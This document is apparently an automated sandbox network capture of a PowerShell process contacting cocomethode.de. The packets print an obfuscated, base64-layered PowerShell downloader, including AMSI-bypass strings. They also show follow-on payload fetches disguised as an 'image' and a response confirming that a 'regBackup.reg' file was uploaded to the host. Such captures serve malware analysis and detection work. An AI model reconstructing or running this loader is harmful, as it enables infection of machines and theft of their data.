Dec 11, 2024 12:30:31.985872984 CET	833	IN	HTTP/1.1 200 OK Content-Type: text/plain; charset=utf-8 Server: Microsoft-IIS/8.5 CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=MFFMT1JB0inje2Qq4jkyGCdsxzQWwdEZx%2BuqRqJVYipNRXTVCxNlsAH1tUkz2iThLP1N%2Fkg1cZ4pub3Ss65Q2xxeaPtqAfJS3x2IO5nHj%2FL2Qnm19hYcYv%2BAhXLVlZFMDsRCK%2F73rs1K"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} CF-RAY: 8f0524a1e95c3650-FRA alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=5324&min_rtt=5324&rtt_var=2662&sent=5&recv=8&lost=0&retrans=0&sent_bytes=0&recv_bytes=6098&delivery_rate=0&cwnd=249&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" X-Powered-By: ARR/3.0 Date: Wed, 11 Dec 2024 11:30:31 GMT Content-Length: 41 Data Raw: 46 69 6c 65 20 72 65 67 42 61 63 6b 75 70 2e 72 65 67 20 75 70 6c 6f 61 64 65 64 20 73 75 63 63 65 73 73 66 75 6c 6c 79 2e Data Ascii: File regBackup.reg uploaded successfully.

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.11.20	49737	104.21.1.51	443	1804	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-11 11:28:58 UTC	163	OUT	GET /OKNf HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-GB) WindowsPowerShell/5.1.19041.1151 Host: cocomethode.de Connection: Keep-Alive
2024-12-11 11:28:58 UTC	1227	IN	HTTP/1.1 200 OK Date: Wed, 11 Dec 2024 11:28:58 GMT Content-Type: application/octet-stream Content-Length: 6383 Connection: close CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=IXMnXrMmfhI%2FJ5V%2BDdv6stcb4S4E2a87nGPogSARCt%2Bcypnd%2FN9uCLdJVvHutkZkOEoaEc5F3DAXXP7rlRNDPZTKjAmiydYvs3j1FOowKwDafmRhzcOzAN6I8CEL%2FdgCVWAA%2BVuSQvgl"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=19092&min_rtt=1194&rtt_var=25906&sent=31658&recv=13521&lost=0&retrans=266&sent_bytes=45382627&recv_bytes=162727&delivery_rate=23526703&cwnd=270&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" X-Powered-By: ARR/3.0 Server: cloudflare CF-RAY: 8f05225c6fcc06f2-ATL server-timing: cfL4;desc="?proto=TCP&rtt=82&min_rtt=82&rtt_var=41&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=399&delivery_rate=0&cwnd=124&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" server-timing: cfL4;desc="?proto=TCP&rtt=40&min_rtt=40&rtt_var=20&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=394&delivery_rate=0&cwnd=228&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
2024-12-11 11:28:58 UTC	219	IN	Data Raw: 73 65 72 76 65 72 2d 74 69 6d 69 6e 67 3a 20 63 66 4c 34 3b 64 65 73 63 3d 22 3f 70 72 6f 74 6f 3d 54 43 50 26 72 74 74 3d 31 31 34 30 34 36 26 6d 69 6e 5f 72 74 74 3d 31 31 34 30 30 39 26 72 74 74 5f 76 61 72 3d 32 34 31 31 30 26 73 65 6e 74 3d 36 26 72 65 63 76 3d 38 26 6c 6f 73 74 3d 30 26 72 65 74 72 61 6e 73 3d 30 26 73 65 6e 74 5f 62 79 74 65 73 3d 32 38 33 35 26 72 65 63 76 5f 62 79 74 65 73 3d 37 37 37 26 64 65 6c 69 76 65 72 79 5f 72 61 74 65 3d 33 33 35 35 37 26 63 77 6e 64 3d 32 34 38 26 75 6e 73 65 6e 74 5f 62 79 74 65 73 3d 30 26 63 69 64 3d 37 30 63 35 36 32 37 37 36 33 64 36 62 32 30 61 26 74 73 3d 38 35 31 26 78 3d 30 22 0d 0a 0d 0a Data Ascii: server-timing: cfL4;desc="?proto=TCP&rtt=114046&min_rtt=114009&rtt_var=24110&sent=6&recv=8&lost=0&retrans=0&sent_bytes=2835&recv_bytes=777&delivery_rate=33557&cwnd=248&unsent_bytes=0&cid=70c5627763d6b20a&ts=851&x=0"
2024-12-11 11:28:58 UTC	1292	IN	Data Raw: 24 6c 67 6e 6b 66 3d 5b 53 79 73 74 65 6d 2e 54 65 78 74 2e 45 6e 63 6f 64 69 6e 67 5d 3a 3a 41 53 43 49 49 2e 47 65 74 53 74 72 69 6e 67 28 5b 53 79 73 74 65 6d 2e 43 6f 6e 76 65 72 74 5d 3a 3a 46 72 6f 6d 42 61 73 65 36 34 53 74 72 69 6e 67 28 22 65 56 52 74 52 6e 52 61 55 32 73 33 52 46 46 76 61 32 52 59 53 6e 4e 4a 52 44 42 6e 53 57 31 6f 4d 47 52 49 51 6e 70 50 61 54 68 32 57 54 49 35 61 6d 49 79 4d 57 78 6b 52 32 68 32 57 6b 64 56 64 56 70 48 56 58 5a 61 62 57 78 7a 57 6c 52 4e 64 6c 6c 71 5a 33 70 61 62 56 56 36 54 55 64 61 61 6b 39 45 56 58 70 4e 65 6b 5a 70 54 56 52 4b 61 6c 6b 79 56 54 56 4f 52 30 55 78 54 6b 64 4e 4e 45 35 71 53 58 68 5a 65 6c 6b 78 57 6c 64 57 61 45 35 74 53 58 64 4e 65 6d 4d 31 54 56 52 72 4d 45 31 74 54 6d 70 61 56 30 6b 30 Data Ascii: $lgnkf=[System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String("eVRtRnRaU2s3RFFva2RYSnNJRDBnSW1oMGRIQnpPaTh2WTI5amIyMWxkR2h2WkdVdVpHVXZabWxzWlRNdllqZ3pabVV6TUdaak9EVXpNekZpTVRKalkyVTVOR0UxTkdNNE5qSXhZelkxWldWaE5tSXdNemM1TVRrME1tTmpaV0k0
2024-12-11 11:28:58 UTC	1369	IN	Data Raw: 54 42 4c 22 29 29 3b 0a 24 78 61 64 65 69 3d 5b 53 79 73 74 65 6d 2e 54 65 78 74 2e 45 6e 63 6f 64 69 6e 67 5d 3a 3a 41 53 43 49 49 2e 47 65 74 53 74 72 69 6e 67 28 5b 53 79 73 74 65 6d 2e 43 6f 6e 76 65 72 74 5d 3a 3a 46 72 6f 6d 42 61 73 65 36 34 53 74 72 69 6e 67 28 22 53 6b 64 46 5a 31 42 54 51 57 6c 6b 56 7a 56 79 59 6d 30 35 4d 32 4a 70 53 54 64 4a 51 54 42 4c 5a 45 68 4b 4e 55 6c 49 63 32 64 4b 52 30 56 6e 55 46 4e 43 59 6c 55 7a 62 48 70 6b 52 31 5a 30 54 47 78 57 65 57 46 57 4d 44 5a 50 61 31 5a 36 57 54 4a 47 64 31 70 56 55 6d 68 6b 52 30 5a 55 5a 45 68 4b 63 47 4a 74 59 32 39 4c 52 57 52 73 5a 45 4d 78 57 47 4a 58 62 46 42 5a 62 58 42 73 57 54 4e 52 5a 30 78 56 4e 57 68 69 56 31 5a 36 59 30 64 47 61 6c 70 54 51 57 6c 6a 62 54 6c 32 5a 45 5a 34 Data Ascii: TBL"));$xadei=[System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String("SkdFZ1BTQWlkVzVyYm05M2JpSTdJQTBLZEhKNUlIc2dKR0VnUFNCYlUzbHpkR1Z0TGxWeWFWMDZPa1Z6WTJGd1pVUmhkR0ZUZEhKcGJtY29LRWRsZEMxWGJXbFBZbXBsWTNRZ0xVNWhiV1Z6Y0dGalpTQWljbTl2ZEZ4
2024-12-11 11:28:58 UTC	1369	IN	Data Raw: 45 64 57 65 57 4a 70 51 6e 42 69 62 6c 46 6e 56 54 4a 6f 64 6d 51 78 5a 48 42 69 62 56 4a 32 5a 48 6c 6f 53 6d 4a 75 55 6c 46 6b 53 45 6c 6e 59 55 5a 6b 64 56 70 44 64 32 64 68 56 7a 55 77 53 55 63 31 52 47 4a 58 55 6c 52 68 52 7a 6b 7a 53 31 52 7a 5a 31 63 77 55 6e 4e 69 52 57 78 30 59 30 63 35 65 57 52 44 5a 32 6c 6b 57 45 35 73 59 32 70 4e 65 55 78 74 55 6e 4e 69 51 30 6c 77 57 46 4e 43 64 32 52 58 53 6e 4e 68 56 30 31 6e 59 7a 4e 53 61 47 52 48 62 47 70 4a 52 31 59 30 5a 45 64 57 65 57 4a 70 51 6b 70 69 62 6c 4a 52 5a 45 68 4a 5a 31 49 79 56 6a 42 53 62 54 6c 35 57 6c 64 6b 65 57 49 7a 56 6e 56 61 52 6d 52 77 59 6d 31 53 64 6d 52 35 5a 33 42 50 65 55 49 35 53 6e 6c 42 64 46 52 48 52 6e 56 61 4d 31 5a 6f 57 6a 4a 56 5a 31 45 78 54 6d 39 5a 57 45 70 33 Data Ascii: EdWeWJpQnBiblFnVTJodmQxZHBibVJ2ZHloSmJuUlFkSElnYUZkdVpDd2dhVzUwSUc1RGJXUlRhRzkzS1RzZ1cwUnNiRWx0Y0c5eWRDZ2lkWE5sY2pNeUxtUnNiQ0lwWFNCd2RXSnNhV01nYzNSaGRHbGpJR1Y0ZEdWeWJpQkpiblJRZEhJZ1IyVjBSbTl5WldkeWIzVnVaRmRwYm1SdmR5Z3BPeUI5SnlBdFRHRnVaM1ZoWjJVZ1ExTm9ZWEp3
2024-12-11 11:28:58 UTC	939	IN	Data Raw: 72 69 6e 67 28 5b 53 79 73 74 65 6d 2e 43 6f 6e 76 65 72 74 5d 3a 3a 46 72 6f 6d 42 61 73 65 36 34 53 74 72 69 6e 67 28 22 54 6d 39 75 55 48 55 3d 22 29 29 3b 0a 24 62 75 6b 66 6e 73 3d 5b 53 79 73 74 65 6d 2e 54 65 78 74 2e 45 6e 63 6f 64 69 6e 67 5d 3a 3a 41 53 43 49 49 2e 47 65 74 53 74 72 69 6e 67 28 5b 53 79 73 74 65 6d 2e 43 6f 6e 76 65 72 74 5d 3a 3a 46 72 6f 6d 42 61 73 65 36 34 53 74 72 69 6e 67 28 22 58 32 56 75 59 57 4a 73 5a 57 51 3d 22 29 29 3b 0a 24 68 72 7a 75 71 61 67 63 6b 7a 3d 5b 53 79 73 74 65 6d 2e 54 65 78 74 2e 45 6e 63 6f 64 69 6e 67 5d 3a 3a 41 53 43 49 49 2e 47 65 74 53 74 72 69 6e 67 28 5b 53 79 73 74 65 6d 2e 43 6f 6e 76 65 72 74 5d 3a 3a 46 72 6f 6d 42 61 73 65 36 34 53 74 72 69 6e 67 28 22 62 51 3d 3d 22 29 29 3b 0a 24 69 61 Data Ascii: ring([System.Convert]::FromBase64String("Tm9uUHU="));$bukfns=[System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String("X2VuYWJsZWQ="));$hrzuqagckz=[System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String("bQ=="));$ia
2024-12-11 11:28:59 UTC	1369	IN	Data Raw: 74 65 6d 2e 43 6f 6e 76 65 72 74 5d 3a 3a 46 72 6f 6d 42 61 73 65 36 34 53 74 72 69 6e 67 28 22 62 58 4e 70 53 57 35 70 64 45 5a 68 61 57 78 6c 5a 41 3d 3d 22 29 29 3b 0a 24 64 65 69 73 75 78 6d 3d 5b 53 79 73 74 65 6d 2e 54 65 78 74 2e 45 6e 63 6f 64 69 6e 67 5d 3a 3a 41 53 43 49 49 2e 47 65 74 53 74 72 69 6e 67 28 5b 53 79 73 74 65 6d 2e 43 6f 6e 76 65 72 74 5d 3a 3a 46 72 6f 6d 42 61 73 65 36 34 53 74 72 69 6e 67 28 22 59 51 3d 3d 22 29 29 3b 0a 24 68 6a 79 72 77 64 3d 5b 53 79 73 74 65 6d 2e 54 65 78 74 2e 45 6e 63 6f 64 69 6e 67 5d 3a 3a 41 53 43 49 49 2e 47 65 74 53 74 72 69 6e 67 28 5b 53 79 73 74 65 6d 2e 43 6f 6e 76 65 72 74 5d 3a 3a 46 72 6f 6d 42 61 73 65 36 34 53 74 72 69 6e 67 28 22 64 47 56 74 4c 6b 31 68 62 6d 46 6e 5a 57 31 6c 62 6e 51 75 Data Ascii: tem.Convert]::FromBase64String("bXNpSW5pdEZhaWxlZA=="));$deisuxm=[System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String("YQ=="));$hjyrwd=[System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String("dGVtLk1hbmFnZW1lbnQu
2024-12-11 11:28:59 UTC	45	IN	Data Raw: 65 72 74 5d 3a 3a 46 72 6f 6d 42 61 73 65 36 34 53 74 72 69 6e 67 28 28 24 78 61 64 65 69 20 2b 20 24 6c 67 6e 6b 66 29 29 29 29 3b 0a Data Ascii: ert]::FromBase64String(($xadei + $lgnkf))));

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.11.20	49738	104.21.1.51	443	1804	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-11 11:29:00 UTC	369	OUT	GET /file3/b83fe30fc85331b12cce94a54c8621c65eea6b03791942cceb80937bd723c6b18fd123c1f55782c1aa93f7ccdfccb20f78866afc8074889dd125916882b0ad29e2f1b013f9f235865a5d8e4be95dccfbcf72fc95b375ca83c0d95f43fa19f849/Windows%20Defender/16/16/user/206 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-GB) WindowsPowerShell/5.1.19041.1151 Host: cocomethode.de
2024-12-11 11:29:01 UTC	1292	IN	HTTP/1.1 200 OK Date: Wed, 11 Dec 2024 11:29:01 GMT Content-Type: application/octet-stream Content-Length: 2866 Connection: close content-disposition: attachment; filename=image; filename*=UTF-8''image CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=OO538G0Kxv%2FJ7kqXb0hPDIFnZPj73ZDsgIBp6Zp%2FW9ZGdRe4Eek9h2IgEin3TWI62rZ%2BKTG%2B04fNUZugbnttncQI1sCmQ6Fg42rJgrl6Q6XMxQi%2Bo4bUU89RKakOrySWFnS7yVlG6Tse"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=24283&min_rtt=1490&rtt_var=30512&sent=2129&recv=1011&lost=0&retrans=0&sent_bytes=2992072&recv_bytes=29164&delivery_rate=45713181&cwnd=266&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" X-Powered-By: ARR/3.0 Server: cloudflare CF-RAY: 8f05226c1dbcc00b-ATL server-timing: cfL4;desc="?proto=TCP&rtt=40&min_rtt=40&rtt_var=20&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=659&delivery_rate=0&cwnd=111&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" server-timing: cfL4;desc="?proto=TCP&rtt=48&min_rtt=48&rtt_var=24&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=645&delivery_rate=0&cwnd=111&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
2024-12-11 11:29:01 UTC	613	IN	Data Raw: 73 65 72 76 65 72 2d 74 69 6d 69 6e 67 3a 20 63 66 4c 34 3b 64 65 73 63 3d 22 3f 70 72 6f 74 6f 3d 54 43 50 26 72 74 74 3d 35 33 26 6d 69 6e 5f 72 74 74 3d 35 33 26 72 74 74 5f 76 61 72 3d 32 36 26 73 65 6e 74 3d 31 26 72 65 63 76 3d 33 26 6c 6f 73 74 3d 30 26 72 65 74 72 61 6e 73 3d 30 26 73 65 6e 74 5f 62 79 74 65 73 3d 30 26 72 65 63 76 5f 62 79 74 65 73 3d 36 33 31 26 64 65 6c 69 76 65 72 79 5f 72 61 74 65 3d 30 26 63 77 6e 64 3d 31 31 31 26 75 6e 73 65 6e 74 5f 62 79 74 65 73 3d 30 26 63 69 64 3d 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 26 74 73 3d 30 26 78 3d 30 22 0d 0a 73 65 72 76 65 72 2d 74 69 6d 69 6e 67 3a 20 63 66 4c 34 3b 64 65 73 63 3d 22 3f 70 72 6f 74 6f 3d 54 43 50 26 72 74 74 3d 35 36 26 6d 69 6e 5f 72 74 74 3d 35 36 26 72 74 74 Data Ascii: server-timing: cfL4;desc="?proto=TCP&rtt=53&min_rtt=53&rtt_var=26&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=631&delivery_rate=0&cwnd=111&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"server-timing: cfL4;desc="?proto=TCP&rtt=56&min_rtt=56&rtt
2024-12-11 11:29:01 UTC	833	IN	Data Raw: 25 60 6e 60 6f 76 6b 79 71 71 3c 5a 52 78 72 75 64 6c 2f 55 64 79 75 2f 44 6f 62 6e 65 68 6f 66 5c 3b 3b 40 52 42 48 48 2f 46 64 75 52 75 73 68 6f 66 29 5a 52 78 72 75 64 6c 2f 42 6e 6f 77 64 73 75 5c 3b 3b 47 73 6e 6c 43 60 72 64 37 35 52 75 73 68 6f 66 29 23 53 31 31 79 55 57 65 4e 63 44 34 44 63 46 69 4f 63 57 54 31 55 6a 53 5b 64 44 30 75 53 55 4f 4e 53 44 31 78 55 31 65 4b 4c 54 35 78 56 6c 71 4e 53 31 6a 31 56 56 30 56 60 6a 34 44 57 59 65 60 60 6d 71 72 55 6d 65 4e 63 57 71 70 60 7b 47 51 57 47 71 71 56 57 53 46 60 57 6d 70 56 55 43 5b 57 47 5b 72 55 56 30 56 60 30 71 44 50 55 4f 60 57 30 71 71 55 31 65 46 63 44 34 54 53 55 57 60 60 6c 75 35 55 6d 53 53 4f 54 34 37 57 59 6d 4b 60 6f 4f 4e 50 33 6d 43 5b 31 6d 45 50 6b 43 6b 63 6c 75 4e 50 33 6d 43 Data Ascii: %`n`ovkyqq<ZRxrudl/Udyu/Dobnehof\;;@RBHH/FduRushof)ZRxrudl/Bnowdsu\;;GsnlC`rd75Rushof)#S11yUWeNcD4DcFiOcWT1UjS[dD0uSUONSD1xU1eKLT5xVlqNS1j1VV0V`j4DWYe``mqrUmeNcWqp`{GQWGqqVWSF`WmpVUC[WG[rUV0V`0qDPUO`W0qqU1eFcD4TSUW``lu5UmSSOT47WYmK`oONP3mC[1mEPkCkcluNP3mC
2024-12-11 11:29:01 UTC	1369	IN	Data Raw: 47 75 53 6f 71 69 57 31 34 53 56 57 69 4a 64 6c 47 59 4f 56 34 51 65 7b 43 4d 52 54 4f 43 5b 31 6d 45 50 56 65 4b 50 31 47 73 56 56 34 72 4c 47 71 57 53 6f 6d 6b 63 54 58 30 52 54 50 76 5b 31 71 49 55 6f 5b 68 63 6d 4b 72 58 6c 34 53 65 57 6a 78 4e 59 57 6a 53 30 5b 30 5b 44 53 7b 55 6a 4f 71 50 56 65 4b 50 31 47 6f 52 54 4f 43 5b 30 71 75 4e 59 6d 4b 50 33 65 73 58 57 4f 43 4e 54 6d 44 50 55 65 4b 50 30 4b 76 52 54 4c 79 62 33 53 45 50 56 75 5b 63 6c 76 76 56 6d 57 46 64 56 4f 75 53 6b 57 4c 60 32 69 72 58 6c 30 6a 4c 46 47 44 62 33 65 4a 53 33 75 78 52 32 6d 73 5b 33 57 34 50 56 75 5b 63 6c 76 76 56 6d 57 46 64 56 4f 75 53 6b 57 59 64 57 4b 76 56 47 4f 43 4e 54 6d 45 54 6c 6d 6d 56 47 4b 72 54 57 69 4a 64 57 6d 58 63 46 4b 4a 53 33 79 6a 52 54 4c 79 60 Data Ascii: GuSoqiW14SVWiJdlGYOV4Qe{CMRTOC[1mEPVeKP1GsVV4rLGqWSomkcTX0RTPv[1qIUo[hcmKrXl4SeWjxNYWjS0[0[DS{UjOqPVeKP1GoRTOC[0quNYmKP3esXWOCNTmDPUeKP0KvRTLyb3SEPVu[clvvVmWFdVOuSkWL`2irXl0jLFGDb3eJS3uxR2ms[3W4PVu[clvvVmWFdVOuSkWYdWKvVGOCNTmETlmmVGKrTWiJdWmXcFKJS3yjRTLy`
2024-12-11 11:29:01 UTC	664	IN	Data Raw: 65 50 54 31 4b 68 58 7b 4f 52 64 56 47 59 4f 56 34 58 54 33 65 73 58 6a 62 34 63 6d 53 58 55 6c 34 4b 52 49 65 6f 54 55 48 34 65 56 53 75 57 6f 6d 6a 53 6d 4b 33 55 47 57 76 64 6c 48 78 4f 49 43 51 65 7b 43 4d 52 54 4f 43 5b 31 6d 45 54 6f 4f 68 4c 6c 53 4e 56 6d 69 4e 64 6d 6d 59 5b 46 79 6b 64 54 44 34 52 54 57 43 63 31 75 54 62 31 34 45 60 54 47 6f 52 54 4f 43 60 33 4b 49 4e 56 34 54 57 30 5b 37 58 7b 4b 46 63 6d 71 58 55 56 65 4d 64 6b 43 6f 52 6a 69 4e 4c 46 4f 75 63 49 57 60 4c 44 71 33 56 6a 69 73 4f 31 53 53 63 33 65 4b 50 31 47 6f 52 6a 65 35 65 6d 6e 76 4c 56 79 6b 4c 31 34 6e 56 6b 4b 56 64 6a 6d 45 62 7b 6d 4b 50 31 6d 31 55 47 4c 76 65 44 79 55 4c 49 53 4c 54 7b 43 31 52 56 71 7b 55 6a 4f 6f 4c 44 75 4b 50 31 47 6f 52 54 4f 52 63 30 71 59 53 Data Ascii: ePT1KhX{ORdVGYOV4XT3esXjb4cmSXUl4KRIeoTUH4eVSuWomjSmK3UGWvdlHxOICQe{CMRTOC[1mEToOhLlSNVmiNdmmY[FykdTD4RTWCc1uTb14E`TGoRTOC`3KINV4TW0[7X{KFcmqXUVeMdkCoRjiNLFOucIW`LDq3VjisO1SSc3eKP1GoRje5emnvLVykL14nVkKVdjmEb{mKP1m1UGLveDyULISLT{C1RVq{UjOoLDuKP1GoRTORc0qYS

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.11.20	49739	104.21.1.51	443	1804	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-11 11:29:01 UTC	285	OUT	POST /609aafcaa17aae4dc51ce49a2e84612a74368b57fc4b8bec450f6e5cff9596ba1bb64a5e2edd07efb8ae519f91549752 HTTP/1.1 Content-Type: application/json User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-GB) WindowsPowerShell/5.1.19041.1151 Host: cocomethode.de Content-Length: 303
2024-12-11 11:29:01 UTC	303	OUT	Data Raw: 5b 0d 0a 20 20 20 20 22 5c 22 62 65 67 69 6e 20 64 6f 77 6e 6c 6f 61 64 20 68 74 74 70 73 3a 2f 2f 63 6f 63 6f 6d 65 74 68 6f 64 65 2e 64 65 2f 66 69 6c 65 32 2f 32 66 35 30 65 65 63 37 62 37 66 65 39 38 39 63 33 36 30 32 65 34 32 66 65 31 32 65 30 39 65 62 62 30 33 32 30 30 35 61 39 66 39 31 37 32 61 37 36 32 65 61 65 61 66 66 34 31 32 35 37 66 65 37 38 31 36 38 37 39 36 38 33 32 63 34 66 64 32 38 38 62 36 32 63 38 65 63 34 31 31 35 36 36 61 38 36 34 37 63 30 64 63 66 30 65 38 37 36 35 39 34 65 36 33 65 65 66 63 33 32 61 62 62 65 36 32 63 66 37 65 31 36 39 39 31 31 36 30 62 66 34 32 65 63 35 36 39 39 61 33 35 39 36 36 62 61 61 61 38 31 64 39 31 38 65 65 38 65 30 63 66 64 36 37 34 39 35 62 35 35 64 34 61 61 32 61 33 39 61 34 35 65 31 64 33 66 33 62 61 65 Data Ascii: [ "\"begin download https://cocomethode.de/file2/2f50eec7b7fe989c3602e42fe12e09ebb032005a9f9172a762eaeaff41257fe78168796832c4fd288b62c8ec411566a8647c0dcf0e876594e63eefc32abbe62cf7e16991160bf42ec5699a35966baaa81d918ee8e0cfd67495b55d4aa2a39a45e1d3f3bae
2024-12-11 11:29:02 UTC	1210	IN	HTTP/1.1 200 OK Date: Wed, 11 Dec 2024 11:29:02 GMT Content-Length: 0 Connection: close CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=AVmjF4Rkh%2BJiLUrBivNucri5ZoyENXaGjAKQvONICMaUeVy%2BDI4xiI5k%2FoLPKOLijRMwwtUfKY2DC%2F0JM1Dj8n5HAONFYmfjhc4AZUDL3yMGu7qW1PsndGcMZCg9DikoANTkPGG9iSNV"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=39951&min_rtt=1124&rtt_var=27538&sent=6495&recv=2684&lost=0&retrans=0&sent_bytes=9284278&recv_bytes=39980&delivery_rate=16375442&cwnd=224&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" X-Powered-By: ARR/3.0 Server: cloudflare CF-RAY: 8f052273bff2b030-ATL server-timing: cfL4;desc="?proto=TCP&rtt=77&min_rtt=51&rtt_var=30&sent=5&recv=7&lost=0&retrans=0&sent_bytes=7420&recv_bytes=1242&delivery_rate=1283980392&cwnd=126&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" server-timing: cfL4;desc="?proto=TCP&rtt=113908&min_rtt=113754&rtt_var=24244&sent=6&recv=8&lost=0&retrans=0&sent_bytes=2835&recv_bytes=1248&delivery_rate=33510&cwnd=252&unsent_bytes=0&cid=4983aae9ec6c086d&ts=585&x=0"

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.11.20	49740	104.21.1.51	443	1804	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-11 11:29:02 UTC	365	OUT	GET /file2/2f50eec7b7fe989c3602e42fe12e09ebb032005a9f9172a762eaeaff41257fe78168796832c4fd288b62c8ec411566a8647c0dcf0e876594e63eefc32abbe62cf7e16991160bf42ec5699a35966baaa81d918ee8e0cfd67495b55d4aa2a39a45e1d3f3bae765c97e7ceb82114cdc97d1 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-GB) WindowsPowerShell/5.1.19041.1151 Host: cocomethode.de
2024-12-11 11:29:03 UTC	1288	IN	HTTP/1.1 200 OK Date: Wed, 11 Dec 2024 11:29:03 GMT Content-Type: application/octet-stream Content-Length: 2860 Connection: close content-disposition: attachment; filename=image; filename*=UTF-8''image CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=5C4bb5YS9IZz8nLzr8fLqZ%2F7yJ%2BBEOBfEvebJdgocs0CYYN6nCZcEXQhCqSysyxcqOIwrGLKGQiFbjA7kNt7o0edd4uuOGU%2BD35TOpUXsXUrxmlWV4C21yfXx3w5bleTwIFO75vHcnhq"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=23889&min_rtt=1366&rtt_var=28633&sent=6595&recv=2847&lost=0&retrans=0&sent_bytes=9467904&recv_bytes=22502&delivery_rate=37871447&cwnd=260&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" X-Powered-By: ARR/3.0 Server: cloudflare CF-RAY: 8f05227909ee6748-ATL server-timing: cfL4;desc="?proto=TCP&rtt=43&min_rtt=43&rtt_var=21&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=627&delivery_rate=0&cwnd=117&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" server-timing: cfL4;desc="?proto=TCP&rtt=43&min_rtt=43&rtt_var=21&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=620&delivery_rate=0&cwnd=219&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
2024-12-11 11:29:03 UTC	220	IN	Data Raw: 73 65 72 76 65 72 2d 74 69 6d 69 6e 67 3a 20 63 66 4c 34 3b 64 65 73 63 3d 22 3f 70 72 6f 74 6f 3d 54 43 50 26 72 74 74 3d 31 31 33 39 35 38 26 6d 69 6e 5f 72 74 74 3d 31 31 33 39 34 34 26 72 74 74 5f 76 61 72 3d 32 34 30 36 30 26 73 65 6e 74 3d 36 26 72 65 63 76 3d 38 26 6c 6f 73 74 3d 30 26 72 65 74 72 61 6e 73 3d 30 26 73 65 6e 74 5f 62 79 74 65 73 3d 32 38 33 35 26 72 65 63 76 5f 62 79 74 65 73 3d 31 30 30 33 26 64 65 6c 69 76 65 72 79 5f 72 61 74 65 3d 33 33 36 30 32 26 63 77 6e 64 3d 32 35 32 26 75 6e 73 65 6e 74 5f 62 79 74 65 73 3d 30 26 63 69 64 3d 62 37 38 61 33 34 33 32 36 64 33 63 36 38 64 34 26 74 73 3d 38 36 33 26 78 3d 30 22 0d 0a 0d 0a Data Ascii: server-timing: cfL4;desc="?proto=TCP&rtt=113958&min_rtt=113944&rtt_var=24060&sent=6&recv=8&lost=0&retrans=0&sent_bytes=2835&recv_bytes=1003&delivery_rate=33602&cwnd=252&unsent_bytes=0&cid=b78a34326d3c68d4&ts=863&x=0"
